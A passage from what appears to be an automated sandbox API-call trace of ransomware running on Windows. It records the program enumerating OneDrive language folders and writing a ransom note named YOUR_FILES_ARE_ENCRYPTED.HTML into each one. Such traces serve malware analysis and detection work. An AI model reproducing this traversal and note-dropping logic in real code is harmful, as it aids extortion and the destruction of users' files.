dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.786] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9d14cf, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xb9d14cf, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xf3c8687, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.786] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3c8687, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xf3c8687, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1207c939, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.786] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.786] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab\\FileSync.LocalizedResources.dll.mui") returned 119 [0113.786] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.786] lstrlenW (lpString=".mui") returned 4 [0113.786] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.786] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3c8687, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xf3c8687, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1207c939, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.786] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.786] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0113.786] GetProcessHeap () returned 0x600000 [0113.786] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\pa-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.787] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.788] CloseHandle (hObject=0x334) returned 1 [0113.788] GetProcessHeap () returned 0x600000 [0113.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.788] GetProcessHeap () returned 0x600000 [0113.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.788] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12292aaa, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x12292aaa, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x12292aaa, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pa-arab-pk", cAlternateFileName="PA-ARA~1")) returned 1 [0113.788] StrStrIW (lpFirst="pa-arab-pk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.788] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab-pk") returned 86 [0113.788] GetProcessHeap () returned 0x600000 [0113.788] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.788] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab-pk" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab-pk") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab-pk" [0113.788] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab-pk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab-pk\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab-pk\\*" [0113.788] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab-pk\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12292aaa, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x12292aaa, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x148de442, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0113.789] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12292aaa, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x12292aaa, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x148de442, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.789] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x148de442, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x148de442, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x14ace4c5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.789] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.789] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab-pk\\FileSync.LocalizedResources.dll.mui") returned 122 [0113.789] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.789] lstrlenW (lpString=".mui") returned 4 [0113.789] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.789] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x148de442, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x148de442, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x14ace4c5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.789] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0113.789] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0113.789] GetProcessHeap () returned 0x600000 [0113.789] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pa-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\pa-arab-pk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.790] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.791] CloseHandle (hObject=0x334) returned 1 [0113.791] GetProcessHeap () returned 0x600000 [0113.791] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.791] GetProcessHeap () returned 0x600000 [0113.791] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.791] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x158115d2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x158115d2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x158115d2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pl", cAlternateFileName="")) returned 1 [0113.791] StrStrIW (lpFirst="pl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.791] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pl") returned 78 [0113.791] GetProcessHeap () returned 0x600000 [0113.791] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.791] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pl" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pl") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pl" [0113.791] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pl\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pl\\*" [0113.791] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pl\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x158115d2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x158115d2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x16423422, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x626878 [0113.791] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x158115d2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x158115d2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x16423422, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.791] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16423422, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x16423422, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1674456a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x16ec0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.791] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.791] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pl\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.791] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.791] lstrlenW (lpString=".mui") returned 4 [0113.791] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.791] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16423422, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x16423422, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1674456a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x16ec0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.792] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0113.792] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.792] GetProcessHeap () returned 0x600000 [0113.792] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\pl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.794] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.795] CloseHandle (hObject=0x334) returned 1 [0113.795] GetProcessHeap () returned 0x600000 [0113.795] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.795] GetProcessHeap () returned 0x600000 [0113.795] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.796] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1680305d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1680305d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1680305d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="prs-af", cAlternateFileName="")) returned 1 [0113.796] StrStrIW (lpFirst="prs-af", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.796] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\prs-af") returned 82 [0113.796] GetProcessHeap () returned 0x600000 [0113.796] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.797] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\prs-af" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\prs-af") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\prs-af" [0113.797] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\prs-af", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\prs-af\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\prs-af\\*" [0113.797] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\prs-af\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1680305d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1680305d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x18f80014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.798] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1680305d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1680305d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x18f80014, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.798] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18e9b2c8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x18e9b2c8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c03a060, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.798] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.798] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\prs-af\\FileSync.LocalizedResources.dll.mui") returned 118 [0113.798] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.798] lstrlenW (lpString=".mui") returned 4 [0113.798] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.798] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18e9b2c8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x18e9b2c8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c03a060, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.798] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.798] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\prs-af\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0113.798] GetProcessHeap () returned 0x600000 [0113.798] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\prs-af\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\prs-af\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.799] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.800] CloseHandle (hObject=0x334) returned 1 [0113.800] GetProcessHeap () returned 0x600000 [0113.800] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.800] GetProcessHeap () returned 0x600000 [0113.800] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.800] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cc25c4f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1cc25c4f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1cc25c4f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pt-br", cAlternateFileName="")) returned 1 [0113.800] StrStrIW (lpFirst="pt-br", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.800] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-br") returned 81 [0113.800] GetProcessHeap () returned 0x600000 [0113.800] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.800] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-br" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-br") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-br" [0113.800] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-br", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-br\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-br\\*" [0113.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\pt-br\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cc25c4f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1cc25c4f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1f710191, 